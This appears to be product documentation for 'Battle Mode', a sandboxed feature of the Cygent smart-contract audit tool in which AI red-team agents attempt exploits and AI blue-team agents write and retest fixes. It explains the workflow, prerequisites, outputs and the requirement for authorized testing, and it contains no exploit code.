Battle Mode Overview
A red-team / blue-team sandbox that proves whether a finding is actually exploitable — and produces a verified fix PR.
Overview
Battle Mode is Cygent's most advanced feature. It answers a question every security team eventually has to answer in a high-stakes way: is this finding actually exploitable in a live environment, or is it just a theoretical pattern?
The approach is simple in concept: put your contracts in a sandbox, unleash AI attackers at them, let AI defenders patch what the attackers exploit, and produce a PR with only the fixes that actually stopped the attacks. No "we think this might matter" — only "we proved this was exploitable, and we proved the fix closes the door."
The core idea
Every audit produces findings. Findings have severity labels, reasoning, recommended fixes. But severity is a prediction. It's a model's best reasoning about how a bug might be exploited, based on the code. It is not a demonstration.
Battle Mode moves from prediction to demonstration:
Clone to sandbox
Clone your contracts into an isolated sandbox. Deploy with realistic state.
Red Team attacks
AI agents write real exploit transactions — not pseudo-code, actual calldata targeting your deployed contracts.
Blue Team patches
AI agents watch, then attempt fixes once exploits land. Each fix verified against the exact exploit.
Retest
Red Team returns with fresh exploits against the patched code. Only surviving fixes count.
Ship the PR
Surface results: Exploited findings, Defended fixes, and a PR containing only verified fixes.
What you get at the end is categorically different from an audit. An audit says "this looks wrong." Battle Mode says "we exploited it; here's the exploit; here's the fix; we proved the fix holds."
When to use Battle Mode
Battle Mode is heavy — it runs longer, costs more compute, and requires your repo to have working build and test commands — so use it deliberately.
| Situation | Why Battle Mode fits |
|---|---|
| Pre-mainnet | The last gate before a deploy. Stress-test survival checkpoint. |
| Post-audit, before release | Validate that remediation actually worked — not just compiled. |
| Contested findings | A finding looks real to Cygent but your team thinks it's a false positive. Let the attacker try to land it. |
| After a major refactor | Confirm the refactor didn't introduce anything new that a scanner-style audit would miss. |
It's not for every day. It's for moments when you need proof.
Requirements
Battle Mode is an opt-in experimental feature with a few non-trivial prerequisites:
Enable it: Go to the agent's Settings → Experimental section and toggle Battle Mode on. The Battle Mode tab appears once enabled.
| Prerequisite | Detail |
|---|---|
| Completed CARA audit | Battle Mode uses the finding list as its attack surface hint |
| Working build and test | forge build and forge test must pass from a fresh clone (or your custom commands) |
| Sandbox environment | Local Anvil (fast, ephemeral) or BattleChain (dedicated test network) |
| Deployment inputs | A deployment script or the constructor args + initial state needed to deploy |
Only run Battle Mode on code you own or have explicit permission to test. The whole point is that the attacker agents genuinely try to exploit the deployed contracts. Pointing Battle Mode at someone else's protocol without authorization is, at minimum, bad manners and potentially illegal.
Red Team vs Blue Team
The agents split along the classic security-exercise line.
Red Team — the attackers
The Red Team's job is to break things. They read the code, pull in the CARA finding context, and generate exploit transactions. For each known finding they try to write a working PoC. Then, once they've exercised the known findings, they go hunting for new vulnerabilities — attack surfaces CARA missed, composite exploits that chain multiple contracts, edge cases in state transitions.
When a Red Team exploit succeeds — funds drained, state corrupted, admin privileges taken — that finding is marked Exploited. That's the proof.
Blue Team — the defenders
The Blue Team's job is to stop the exploits. Once a finding is Exploited, Blue Team agents take up to 3 attempts to patch it. Each patch is verified against the exact exploit the Red Team used — if the exploit no longer lands, the patch is a candidate fix.
The twist is the Retest phase. After Blue Team proposes a fix, Red Team comes back and tries to write a new exploit against the patched code. If Red Team can't find a new exploit that lands, the fix is marked Defended. If Red Team can bypass the fix, the fix is Bypassed and the finding stays open.
This is the critical mechanism. Any fix can look like it works against the original exploit. The question is whether the fix actually closes the class of bug or just the specific instance — and the only way to know is to let a fresh attacker try again.
The output
When Battle Mode finishes, you get:
| Artifact | Contents |
|---|---|
| Scoreboard | Three counts — Exploited / Fixed / Bypassed — across all findings in scope |
| PR | Only the Defended fixes. Fixes that got Bypassed are left out |
| Per-finding detail | Exploit code, fix diff, retest outcome |
| CSV export | For audit trails and compliance requirements |
See Reading Results for how to interpret the scoreboard.
Launching a battle
Enable the feature
Settings → Experimental → Battle Mode. Accept the risk acknowledgement.
Pick a target project
From the Battle Mode tab, select a project. Battle Mode only lists projects with a completed audit.
Configure the sandbox
Choose Local Anvil or BattleChain. Confirm your build/test commands. Provide deployment inputs if not already scripted.
Scope the battle
Optionally narrow scope to specific findings or contracts. Full-scope battles run longer but produce the most complete results.
Launch
Click Start Battle. Cygent spins up the sandbox, deploys your contracts, and begins the six-phase run.
Battles run asynchronously. You can leave the dashboard and come back — progress and results stream to the battle's page in real time.
See Battle Phases for the full phase-by-phase walkthrough.